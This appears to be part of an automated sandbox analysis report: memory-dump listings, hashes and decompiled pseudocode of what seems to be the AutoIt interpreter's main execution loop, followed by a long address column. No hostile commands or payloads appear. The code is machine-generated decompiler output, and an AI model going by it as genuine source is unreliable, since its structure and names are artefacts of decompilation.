                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsnicmp
                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                • API String ID: 1038674560-3360698832
                • Opcode ID: f0767252081d9bfd50b5071e1d6400066294abdc9c1f6355d762680a224a907f
                • Instruction ID: 02615d96a5aeaeb606cd5a47dd309ffc6dfa86213e4ba3480039bc4d322a3126
                • Opcode Fuzzy Hash: f0767252081d9bfd50b5071e1d6400066294abdc9c1f6355d762680a224a907f
                • Instruction Fuzzy Hash: 4A61E8B0640715B6E711AA21CC42FEB335C9F55744F14802FFD05AA282EFBDEB8586AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F9430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E003F9430(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v152;
				int _v156;
				char _v164;
				struct tagMSG _v188;
				struct HWND__* _v192;
				int _v196;
				struct HWND__* _v204;
				char _v208;
				struct HWND__* _v220;
				struct tagMSG _v244;
				char _v248;
				char _v252;
				long _v256;
				long _v260;
				struct HWND__* _v264;
				int _v268;
				struct HWND__* _v272;
				signed int _v276;
				char _v277;
				char _v288;
				int _v292;
				struct HWND__* _v300;
				struct HWND__* _v304;
				struct HWND__* _v308;
				struct tagMSG* _v312;
				char _v316;
				long _v324;
				signed int _v328;
				char _v329;
				struct HWND__* _v332;
				struct tagMSG* _v336;
				void* __ebx;
				void* __edi;
				signed int __esi;
				intOrPtr _t280;
				int _t282;
				intOrPtr _t283;
				struct tagMSG* _t285;
				struct HWND__* _t291;
				struct HWND__* _t295;
				intOrPtr* _t297;
				struct HWND__* _t299;
				struct HWND__* _t302;
				struct HWND__* _t307;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t336;
				struct HWND__* _t337;
				struct HWND__* _t338;
				struct HWND__* _t342;
				struct HWND__* _t347;
				void* _t349;
				struct HWND__* _t355;
				struct tagMSG* _t358;
				long _t359;
				void* _t368;
				void* _t379;
				void* _t380;
				struct tagMSG* _t384;
				signed int _t385;
				void* _t400;
				signed int _t403;
				void* _t405;
				int _t406;
				void* _t407;
				struct HWND__* _t414;
				int _t415;
				struct HWND__* _t417;
				struct HWND__* _t423;
				intOrPtr _t431;
				struct HWND__* _t437;
				struct HWND__* _t442;
				intOrPtr _t460;
				void* _t462;
				struct tagMSG* _t467;
				signed int _t480;
				struct tagMSG* _t511;
				signed int _t545;
				void* _t549;
				struct tagMSG** _t552;
				struct HWND__** _t553;
				struct tagMSG* _t560;
				struct HWND__* _t564;
				struct HWND__* _t565;
				signed int _t566;
				signed int _t570;
				struct HWND__** _t572;
				void* _t598;

				_t606 = __fp0;
				_t511 = __edx;
				_t471 = __ecx;
				_t572 = (_t570 & 0xfffffff8) - 0x14c;
				_t533 = __ecx;
				_t280 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t280 >= 0xf3c) {
					 *0x4874e2 = 0;
					E0044E724(__fp0, __ecx, 0x9a, 0xffffffff);
					_t282 = 1;
					L33:
					return _t282;
				}
				_t283 = _t280 + 1;
				_v312 = __ecx;
				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
				if(_t283 == 1) {
					E003FFFF0(__ecx, __fp0);
				}
				_t533[0x51] = 0;
				if(_t533[0x3f] != 0) {
					L30:
					_t285 = _t533[0x3b];
					_t533[0x51] = 0;
					if(_t285 == 1) {
						E003FFF70(_t471, _t533);
						__eflags = _t533[0x3f] - 1;
						if(__eflags == 0) {
							goto L32;
						}
						E003F1C50(_t533, _t511, __eflags, _t606);
						LockWindowUpdate(0);
						DestroyWindow( *0x487518); // executed
						_t291 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t291;
						if(_t291 <= 0) {
							goto L32;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t295 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t295;
						} while (_t295 > 0);
						goto L32;
					} else {
						_t533[0x3b] = _t285 - 1;
						L32:
						_t282 = 0;
						goto L33;
					}
				} else {
					while(_t533[0x51] == 0) {
						if( *0x4874e3 != 0) {
							L10:
							if( *0x498624 != 0) {
								_t297 =  *0x498628; // 0x0
								_t460 =  *_t297;
								E00421D6C();
								_t299 = _t533[0x6c];
								_t545 = 0;
								__eflags = _t299;
								if(_t299 == 0) {
									L80:
									__eflags = _t545 - _t299;
									if(__eflags == 0) {
										goto L11;
									}
									E00454D61( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
									_t511 = _t533[0x6b];
									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
									_v276 =  &(_v276->i);
									E003FDE00( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
									E0046D2F8( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
									L29:
									if(_t533[0x3f] == 0) {
										continue;
									}
									goto L30;
								}
								_t471 = _t533[0x6b];
								do {
									_t511 = _t471->hwnd;
									__eflags = _t511->hwnd;
									if(_t511->hwnd == 0) {
										goto L79;
									}
									_t511 = _t511->hwnd;
									__eflags = _t511->hwnd - _t460;
									if(_t511->hwnd == _t460) {
										goto L80;
									}
									L79:
									_t545 = _t545 + 1;
									_t471 =  &(_t471->message);
									__eflags = _t545 - _t533[0x6c];
								} while (_t545 < _t533[0x6c]);
								goto L80;
							}
							L11:
							if( *0x4874ec == 1) {
								__eflags =  *0x4874e3;
								if( *0x4874e3 != 0) {
									goto L12;
								}
								Sleep(0xa);
								goto L29;
							}
							L12:
							if(_t533[0x118] != 0) {
								__eflags =  *0x49954c;
								if( *0x49954c != 0) {
									goto L13;
								}
								_t467 = _t533[0x116];
								 *0x49954c = 1;
								_v308 = 0;
								_v328 = _t467;
								while(1) {
									_t511 =  &_v328;
									 *_t572 = 0;
									_t329 = E004307BC(_t511, _t471);
									__eflags = _t329;
									if(_t329 == 0) {
										goto L93;
									}
									_t347 = _t467->hwnd;
									__eflags =  *((char*)(_t347 + 0x11));
									if( *((char*)(_t347 + 0x11)) != 0) {
										L92:
										_t471 =  &_v324;
										E004307CE( &_v328,  &_v324);
										_t467 = _v336;
										continue;
									}
									_v324 = _t347;
									_t349 = E003FC870( *((intOrPtr*)(_t347 + 0x14)));
									__eflags = _t511;
									if(__eflags < 0) {
										goto L92;
									}
									if(__eflags > 0) {
										L91:
										_v308 =  &(_v308->i);
										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
										E00454D61(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
										_t355 =  &(_v272->i);
										__eflags = _t355;
										_v272 = _t355;
										 *((char*)(_t467->hwnd + 0x10)) = 1;
										E0046D2F8(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0);
										 *((char*)(_t467->hwnd + 0x10)) = 0;
										goto L92;
									}
									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
									if(__eflags < 0) {
										goto L92;
									}
									goto L91;
								}
								while(1) {
									L93:
									_v328 = _t533[0x116];
									while(1) {
										L94:
										_t471 =  &_v328;
										 *_t572 = 0;
										_t331 = E004307BC( &_v328,  &_v328);
										__eflags = _t331;
										if(_t331 == 0) {
											break;
										}
										_t511 = _v328;
										_t342 = _t511->hwnd;
										__eflags =  *((char*)(_t342 + 0x11));
										if( *((char*)(_t342 + 0x11)) != 0) {
											E00442129( &(_t533[0x116]),  &_v328);
											L93:
											_v328 = _t533[0x116];
											continue;
										}
										_t471 =  &_v324;
										_t511 =  &_v328;
										E004307CE(_t511,  &_v324);
									}
									__eflags = _v308;
									 *0x49954c = 0;
									if(_v308 > 0) {
										goto L29;
									}
									goto L13;
								}
							}
							L13:
							if( *0x49863c != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L14;
								}
								__eflags =  *0x498668 - 1;
								if( *0x498668 == 1) {
									goto L14;
								}
								E00437DD1( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t302 = E00441700(0x498630, _t511);
									__eflags = _t302;
									if(_t302 == 0) {
										break;
									}
									__eflags = E00424A5A( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t307 = E00454D61( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
									__eflags = _t307;
									if(_t307 == 0) {
										continue;
									}
									_v300 = 0;
									_v292 = 1;
									_v288 = 0;
									E003F9190(1,  &_v300);
									_v292 = 1;
									_v300 = _v244.hwnd;
									E003F1D10(L"@GUI_CTRLID",  &_v96, __eflags);
									E003F1BE0(2, 1,  &_v300,  &_v96);
									E003F2480( &_v96);
									E003F9190(L"@GUI_CTRLID",  &_v300);
									_v292 = 7;
									_v300 = _v244.pt;
									E003F1D10(L"@GUI_WINHANDLE",  &_v64, __eflags);
									E003F1BE0(2, 1,  &_v300,  &_v64);
									E003F2480( &_v64);
									E003F9190(L"@GUI_WINHANDLE",  &_v300);
									_t536 = L"@GUI_CTRLHANDLE";
									_t559 =  &_v48;
									_v292 = 7;
									_v300 = _v220;
									E003F1D10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
									_t511 =  &_v300;
									E003F1BE0(2, 1, _t511,  &_v48);
									E003F2480( &_v48);
									_t560 = _v312;
									 *((char*)(_t560 + 0x464)) = 1;
									E0046D2F8(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
									 *((char*)(_t560 + 0x464)) = 0;
									_t553 =  &_v316;
									L108:
									E003F9190(_t536, _t553);
									_t471 =  &(_v244.message);
									E003F2480( &(_v244.message));
									_t533 = _v312;
									goto L29;
								}
								_t471 =  &(_v244.message);
								E003F2480( &(_v244.message));
							}
							L14:
							if(E003F9400(_t511, _t606, _t533) == 1) {
								goto L29;
							}
							if( *0x4987b0 != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L16;
								}
								E00437DD1( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t437 = E00443B3B(0x498710, _t511);
									__eflags = _t437;
									if(_t437 == 0) {
										break;
									}
									__eflags = E00424A5A( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t442 = E00454D61( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
									__eflags = _t442;
									if(_t442 == 0) {
										continue;
									}
									_v204 = 0;
									_v196 = 1;
									_v192 = 0;
									E003F9190(1,  &_v204);
									_v196 = 1;
									_t536 = L"@TRAY_ID";
									_v204 = _v244.hwnd;
									E003F1D10(L"@TRAY_ID",  &_v80, __eflags);
									_t511 =  &_v204;
									E003F1BE0(2, 1, _t511,  &_v80);
									E003F2480( &_v80);
									_t552 = _v312;
									__eflags = _v188.pt + 1;
									_t552[0x119] = 1;
									E0046D2F8(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
									_t552[0x119] = 0;
									_t553 =  &_v220;
									goto L108;
								}
								_t471 =  &(_v244.message);
								E003F2480( &(_v244.message));
							}
							L16:
							_t358 = _t533[0x3e];
							if(_t358 == 7) {
								_t511 = _t533[0x114];
								_t359 = WaitForSingleObject(_t511, 0xa);
								_v256 = _t359;
								__eflags = _t359 - 0x102;
								if(_t359 != 0x102) {
									GetExitCodeProcess(_t533[0x114],  &_v256);
									_t511 = _t533[0x114];
									CloseHandle(_t511);
									_v324 = _v256;
									_t471 = _t533 +  *_t533->message;
									E003FD620( &_v324, _t533 +  *_t533->message);
									_t533[0x51] = 1;
									_t533[0x3e] = 0;
								}
								goto L29;
							}
							if(_t358 == 8 || _t358 == 9) {
								Sleep(0xa);
								__eflags = _t533[0x112];
								if(_t533[0x112] == 0) {
									__eflags = 0;
									L127:
									_t511 = _t533[0x10e];
									_t471 =  &_v304;
									E00433C1D(_t511,  &_v304,  &_v329);
									_t572 =  &(_t572[3]);
									__eflags = _t533[0x3e] - 9;
									if(_t533[0x3e] != 9) {
										__eflags = _v329 - 1;
										if(_v329 != 1) {
											goto L29;
										}
										_t462 = 0;
										__eflags = 0;
										L133:
										_t368 = _t533[0x115];
										_v260 = 0xcccccccc;
										__eflags = _t368 - _t462;
										if(_t368 != _t462) {
											GetExitCodeProcess(_t368,  &_v260);
											CloseHandle(_t533[0x115]);
											_t533[0x115] = _t462;
										}
										__eflags = _t533[0x3e] - 8;
										if(_t533[0x3e] != 8) {
											_t511 =  *_t533;
											_t471 = _v260;
											__eflags = _t533 + _t511->message;
											E003F3F00(_t533 + _t511->message, _v260, _t462);
										} else {
											asm("fild dword [esp+0x2c]");
											__eflags = _v304;
											if(_v304 < 0) {
												_t606 = _t606 +  *0x47cd00;
											}
											_t511 =  *_t533;
											_v324 = _t606;
											_t471 =  &_v324;
											E0044742B(_t533 + _t511->message,  &_v324);
										}
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										Sleep(_t533[0xbd]);
										goto L29;
									}
									__eflags = _v329;
									if(_v329 != 0) {
										_v329 = 0;
										goto L29;
									}
									_v329 = 1;
									goto L133;
								}
								_t379 = E003FC870(_t533[0x113]);
								_t462 = 0;
								__eflags = _t511;
								if(__eflags < 0) {
									goto L127;
								}
								if(__eflags > 0) {
									L123:
									_t380 = _t533[0x115];
									__eflags = _t380 - _t462;
									if(_t380 != _t462) {
										CloseHandle(_t380);
										_t533[0x115] = _t462;
									}
									_t511 =  *_t533;
									_t471 = _t533 + _t511->message;
									_v324 = _t462;
									E003FD620( &_v324, _t533 + _t511->message);
									goto L66;
								}
								__eflags = _t379 - _t533[0x112];
								if(_t379 < _t533[0x112]) {
									goto L127;
								}
								goto L123;
							} else {
								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
									Sleep(0xa); // executed
									__eflags = _t533[0xbc];
									if(_t533[0xbc] == 0) {
										L56:
										_t384 = _t533[0x3e];
										__eflags = _t384 - 3;
										if(_t384 < 3) {
											goto L29;
										}
										_t385 = _t384 - 3;
										__eflags = _t385 - 3;
										if(__eflags > 0) {
											goto L29;
										} else {
											switch( *((intOrPtr*)(_t385 * 4 +  &M0041E113))) {
												case 0:
													__eax = E0045F356(__ecx, __fp0, __edi, 1);
													goto L149;
												case 1:
													__eax = E0045F356(__ecx, __fp0, __edi, 1);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														goto L150;
													}
													if(__eflags <= 0) {
														goto L153;
													}
													goto L29;
												case 2:
													_t386 = E0045FD79(__eflags, _t606, _t533);
													L149:
													_t547 = _t386;
													__eflags = _t547;
													if(__eflags >= 0) {
														goto L151;
													}
													goto L150;
												case 3:
													__eax = E0045FD79(__eflags, __fp0, __edi);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														L150:
														_t511 =  ~_t547;
														E003F3EC0(_t533 +  *_t533->message, _t511, 0);
														_t471 = _t533 +  *_t533->message;
														_v332 = 0;
														E003FD620( &_v332, _t533 +  *_t533->message);
														__eflags = _t547;
														L151:
														if(__eflags == 0) {
															goto L29;
														}
														__eflags = _t547;
														if(_t547 <= 0) {
															L156:
															_push(_t533[0xbd]);
															_t533[0x51] = 1;
															_t533[0x3e] = 0;
															E00423187(_t533[0xbd], _t606);
															_t572 =  &(_t572[1]);
															goto L29;
														}
														L153:
														_t389 = _t533[0x3e];
														__eflags = _t389 - 5;
														if(_t389 == 5) {
															L155:
															_v188.hwnd = 0;
															_v188.wParam = 1;
															_v188.lParam = 0;
															E003F9190(_t533,  &_v188);
															_t471 =  *_t533;
															_t511 = _t533 +  *_t533->message;
															__eflags = _t511;
															_v188.wParam = 7;
															_v188 =  *(_t533[0x76]);
															E0046319B( *_t533, _t511,  &_v188, 0);
															E003F9190(_t533,  &_v188);
															goto L156;
														}
														__eflags = _t389 - 3;
														if(_t389 != 3) {
															goto L156;
														}
														goto L155;
													}
													if(__eflags > 0) {
														goto L29;
													}
													goto L153;
											}
										}
										while(1) {
											L58:
											__eflags = _v244.message - 0x12;
											if(_v244.message == 0x12) {
												break;
											}
											_t471 = 0x498630;
											_t336 = E003FD3E0(0x498630,  &_v244);
											__eflags = _t336;
											if(_t336 == 0) {
												_t338 = E003FD400(0x498630,  &_v244);
												__eflags = _t338;
												if(_t338 == 0) {
													TranslateMessage( &_v244);
													_t471 =  &_v244;
													DispatchMessageW( &_v244); // executed
												}
											}
											_t511 =  &_v244;
											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
											__eflags = _t337;
											if(_t337 == 0) {
												L8:
												if( *0x4874e6 == 1) {
													 *0x4874ec = 0;
													 *0x4874e6 = 0;
													_t533[0x3e] = 1;
												}
												if(_t533[0x3e] == 1) {
													_t471 = _t533 +  *_t533->message;
													_v304 = 0;
													E003FD620( &_v304, _t533 +  *_t533->message);
													goto L30;
												} else {
													goto L10;
												}
											} else {
												continue;
											}
										}
										_t533[0x3f] = 1;
										_t533[0x3e] = 1;
										goto L8;
									}
									_t400 = E003FC870(_t533[0xbe]);
									_t471 = 0;
									__eflags = _t511;
									if(__eflags < 0) {
										goto L56;
									}
									_t462 = 0;
									if(__eflags > 0) {
										L65:
										__eflags = _t533[0x3e] - 2;
										if(_t533[0x3e] != 2) {
											_t471 = _t533 +  *_t533->message;
											_v324 = _t462;
											E003FD620( &_v324, _t533 +  *_t533->message);
										}
										L66:
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										goto L29;
									}
									__eflags = _t400 - _t533[0xbc];
									if(_t400 >= _t533[0xbc]) {
										goto L65;
									}
									goto L56;
								} else {
									_t480 = _a4;
									_t533[0x3d] = _t480;
									_t403 = _t480;
									_t471 = _t480 + 1;
									_a4 = _t480 + 1;
									_t598 = _t403 -  *0x4990f8; // 0x0
									if(_t598 > 0 || _t403 <= 0) {
										L160:
										_t533[0x3e] = 1;
										goto L29;
									} else {
										_t405 = (_t403 << 4) +  *0x49912c;
										if(_t405 == 0) {
											goto L160;
										}
										_t549 = _t405;
										_t471 =  *(_t549 + 4);
										_v328 = 0;
										_t511 =  *( *(_t549 + 4));
										_t406 = _t511->wParam;
										if(_t406 != 0) {
											__eflags = _t406 - 0x34;
											if(__eflags != 0) {
												_t407 = _t406 - 1;
												__eflags = _t407 - 0x7e;
												if(_t407 > 0x7e) {
													L166:
													_t511 = _t511->wParam;
													E0044E724(_t606, _t533, 0x1388, _t511);
													goto L29;
												}
												switch( *((intOrPtr*)(( *(_t407 + 0x3f9864) & 0x000000ff) * 4 +  &M003F9850))) {
													case 0:
														__eax = 0;
														__ecx =  &_v164;
														_v164 = 0;
														_v152 = 0;
														__eax =  &_v328;
														__edx = __esi;
														__ebx = __edi;
														_v156 = 1;
														__eax = E003F8F10( &_v328, __ebx, __esi,  &_v164); // executed
														__eflags = __eax;
														if(__eax == 0) {
															__edx =  *(__esi + 4);
															__eax = _v328;
															__eax =  *( *(__esi + 4) + _v328 * 4);
															__eflags =  *((short*)(__eax + 8)) - 0x7f;
															if( *((short*)(__eax + 8)) != 0x7f) {
																__ecx =  *((short*)(__eax + 0xa));
																__eax = E0044E724(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
															}
														}
														__esi =  &_v164;
														__eax = E003F9190(__edi, __esi);
														goto L29;
													case 1:
														E003F9210(_t549, _t606, _t533); // executed
														goto L29;
													case 2:
														__ebx = __edi + 0x488;
														__eax = E004223E7(__ebx);
														__eflags = __al;
														if(__al != 0) {
															__eax =  &_v328;
															__eax = E0046FA6A(__fp0, __edi, __esi,  &_v328, __ebx);
															__eflags = __eax;
															if(__eax != 0) {
																__ecx =  *(__esi + 4);
																__edx = _v328;
																__eax =  *( *(__esi + 4) + _v328 * 4);
																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
																__eax = E0044E724(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
															}
														} else {
															__edx =  *((short*)(__edx + 0xa));
															__eax = E0044E724(__fp0, __edi, 0xa7, __edx);
														}
														goto L29;
													case 3:
														goto L29;
													case 4:
														goto L166;
												}
											}
											_t471 =  &_v276;
											_v276 = 0;
											_v268 = 1;
											_v264 = 0;
											_t414 = E003F98F0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277); // executed
											__eflags = _t414;
											if(_t414 != 0) {
												L37:
												_t564 = _v264;
												__eflags = _t564;
												if(_t564 != 0) {
													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
													_t511 =  *(_t564 + 0xc);
													__eflags = _t511->hwnd;
													if(_t511->hwnd == 0) {
														_push(_t564->i);
														E004010FC();
														_t471 =  *(_t564 + 0xc);
														_push( *(_t564 + 0xc));
														E004010FC();
														_t572 =  &(_t572[2]);
													}
													_push(_t564);
													E004010FC();
													_t572 =  &(_t572[1]);
													_v264 = 0;
												}
												_t415 = _v268;
												__eflags = _t415 - 8;
												if(_t415 == 8) {
													_t565 = _v276;
													__eflags = _t565;
													if(_t565 != 0) {
														__imp__#9(_t565);
														_push(_t565);
														E004010FC();
														_t572 =  &(_t572[1]);
													}
												} else {
													__eflags = _t415 - 0xa;
													if(_t415 == 0xa) {
														_t417 = _v276;
														__eflags = _t417;
														if(_t417 != 0) {
															E004330B0(_t417);
														}
													} else {
														__eflags = _t415 - 5;
														if(_t415 == 5) {
															E003FE470( &_v276, _t564);
														} else {
															__eflags = _t415 - 0xb;
															if(_t415 == 0xb) {
																_t566 = _v276;
																_t511 =  *(_t566 + 4);
																_push(_t511);
																E004010FC();
																_push(_t566);
																E004010FC();
																_t572 =  &(_t572[2]);
															} else {
																__eflags = _t415 - 0xc;
																if(_t415 == 0xc) {
																	_t423 = _v276;
																	__eflags = _t423;
																	if(_t423 != 0) {
																		E0043B350(_t423);
																	}
																}
															}
														}
													}
												}
												goto L29;
											}
											_t511 =  *(_t549 + 4);
											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
											if( *((short*)(_t431 + 8)) != 0x7f) {
												_t471 =  *((short*)(_t431 + 0xa));
												E0044E724(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
												E003F9190(_t533,  &_v288);
												goto L29;
											}
											goto L37;
										} else {
											E003FB1F0(_t606, _t533, _t549,  &_a4); // executed
											goto L29;
										}
									}
								}
							}
						}
						if( *0x498668 != 0) {
							__eflags = _t533[0x3e];
							if(_t533[0x3e] == 0) {
								goto L10;
							}
						}
						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
							goto L58;
						}
						goto L8;
					}
					goto L30;
				}
			}












































































































                0x003f9430
                0x003f9430
                0x003f9430
                0x003f9436
                0x003f943f
                0x003f9441
                0x003f944c
                0x0041d73b
                0x0041d742
                0x0041d747
                0x003f95f5
                0x003f95fb
                0x003f95fb
                0x003f9452
                0x003f9453
                0x003f9457
                0x003f9460
                0x003f97d2
                0x003f97d2
                0x003f946d
                0x003f9474
                0x003f95d6
                0x003f95d6
                0x003f95dc
                0x003f95e6
                0x003f97fd
                0x003f9802
                0x003f9809
                0x00000000
                0x00000000
                0x003f9811
                0x003f9818
                0x003f9825
                0x003f983f
                0x003f9841
                0x003f9843
                0x00000000
                0x00000000
                0x0041e0de
                0x0041e0e6
                0x0041e0f4
                0x0041e108
                0x0041e10a
                0x0041e10a
                0x00000000
                0x003f95ec
                0x003f95ed
                0x003f95f3
                0x003f95f3
                0x00000000
                0x003f95f3
                0x003f9480
                0x003f9480
                0x003f9494
                0x003f94da
                0x003f94e1
                0x0041d796
                0x0041d79b
                0x0041d79d
                0x0041d7a2
                0x0041d7a8
                0x0041d7aa
                0x0041d7ac
                0x0041d7d9
                0x0041d7d9
                0x0041d7db
                0x00000000
                0x00000000
                0x0041d80e
                0x0041d813
                0x0041d822
                0x0041d82d
                0x0041d831
                0x0041d83c
                0x003f95c9
                0x003f95d0
                0x00000000
                0x00000000
                0x00000000
                0x003f95d0
                0x0041d7b2
                0x0041d7b8
                0x0041d7b8
                0x0041d7ba
                0x0041d7bd
                0x00000000
                0x00000000
                0x0041d7c3
                0x0041d7c5
                0x0041d7c7
                0x00000000
                0x00000000
                0x0041d7cd
                0x0041d7cd
                0x0041d7ce
                0x0041d7d1
                0x0041d7d1
                0x00000000
                0x0041d7b8
                0x003f94e7
                0x003f94ee
                0x0041d846
                0x0041d84d
                0x00000000
                0x00000000
                0x0041d855
                0x00000000
                0x0041d855
                0x003f94f4
                0x003f94fb
                0x0041d860
                0x0041d867
                0x00000000
                0x00000000
                0x0041d86d
                0x0041d873
                0x0041d87a
                0x0041d882
                0x0041d886
                0x0041d887
                0x0041d88b
                0x0041d893
                0x0041d898
                0x0041d89a
                0x00000000
                0x00000000
                0x0041d8a0
                0x0041d8a2
                0x0041d8a6
                0x0041d92a
                0x0041d92a
                0x0041d934
                0x0041d939
                0x00000000
                0x0041d939
                0x0041d8af
                0x0041d8b3
                0x0041d8b8
                0x0041d8ba
                0x00000000
                0x00000000
                0x0041d8c0
                0x0041d8d3
                0x0041d8d3
                0x0041d8df
                0x0041d905
                0x0041d912
                0x0041d912
                0x0041d917
                0x0041d91b
                0x0041d91f
                0x0041d926
                0x00000000
                0x0041d926
                0x0041d8ca
                0x0041d8cd
                0x00000000
                0x00000000
                0x00000000
                0x0041d8cd
                0x0041d942
                0x0041d942
                0x0041d948
                0x0041d94c
                0x0041d94c
                0x0041d94d
                0x0041d951
                0x0041d959
                0x0041d95e
                0x0041d960
                0x00000000
                0x00000000
                0x0041d966
                0x0041d96a
                0x0041d96c
                0x0041d970
                0x0041d993
                0x0041d942
                0x0041d948
                0x00000000
                0x0041d948
                0x0041d976
                0x0041d97b
                0x0041d980
                0x0041d980
                0x0041d99a
                0x0041d99f
                0x0041d9a6
                0x00000000
                0x00000000
                0x00000000
                0x0041d9ac
                0x0041d942
                0x003f9501
                0x003f9508
                0x0041d9b1
                0x0041d9b8
                0x00000000
                0x00000000
                0x0041d9be
                0x0041d9c5
                0x00000000
                0x00000000
                0x0041d9d0
                0x0041d9d5
                0x0041d9d5
                0x0041d9df
                0x0041d9e4
                0x0041d9e6
                0x00000000
                0x00000000
                0x0041d9f6
                0x0041d9f8
                0x00000000
                0x00000000
                0x0041da20
                0x0041da25
                0x0041da27
                0x00000000
                0x00000000
                0x0041da34
                0x0041da38
                0x0041da3c
                0x0041da40
                0x0041da49
                0x0041da59
                0x0041da5d
                0x0041da6c
                0x0041da73
                0x0041da7c
                0x0041da91
                0x0041da99
                0x0041da9d
                0x0041daac
                0x0041dab3
                0x0041dabc
                0x0041dac8
                0x0041dacd
                0x0041dad4
                0x0041dadc
                0x0041dae0
                0x0041daeb
                0x0041daef
                0x0041daf6
                0x0041db02
                0x0041db0c
                0x0041db13
                0x0041db18
                0x0041db1e
                0x0041dbb5
                0x0041dbb5
                0x0041dbba
                0x0041dbbe
                0x0041dbc3
                0x00000000
                0x0041dbc3
                0x0041dbcc
                0x0041dbd0
                0x0041dbd0
                0x003f950e
                0x003f9516
                0x00000000
                0x00000000
                0x003f9523
                0x0041dbda
                0x0041dbe1
                0x00000000
                0x00000000
                0x0041dbec
                0x0041dbf1
                0x0041dbf1
                0x0041dbfb
                0x0041dc00
                0x0041dc02
                0x00000000
                0x00000000
                0x0041dc12
                0x0041dc14
                0x00000000
                0x00000000
                0x0041dc3c
                0x0041dc41
                0x0041dc43
                0x00000000
                0x00000000
                0x0041db35
                0x0041db3c
                0x0041db43
                0x0041db4a
                0x0041db53
                0x0041db5a
                0x0041db66
                0x0041db6d
                0x0041db78
                0x0041db7f
                0x0041db86
                0x0041db92
                0x0041db99
                0x0041db9c
                0x0041dba3
                0x0041dba8
                0x0041dbae
                0x00000000
                0x0041dbae
                0x0041dc4a
                0x0041dc4e
                0x0041dc4e
                0x003f9529
                0x003f9529
                0x003f9532
                0x0041dc58
                0x0041dc61
                0x0041dc67
                0x0041dc6b
                0x0041dc70
                0x0041dc82
                0x0041dc88
                0x0041dc8f
                0x0041dc9e
                0x0041dca2
                0x0041dca8
                0x0041dcad
                0x0041dcb4
                0x0041dcb4
                0x00000000
                0x0041dc70
                0x003f953b
                0x0041dcc5
                0x0041dccb
                0x0041dcd2
                0x0041dd35
                0x0041dd37
                0x0041dd37
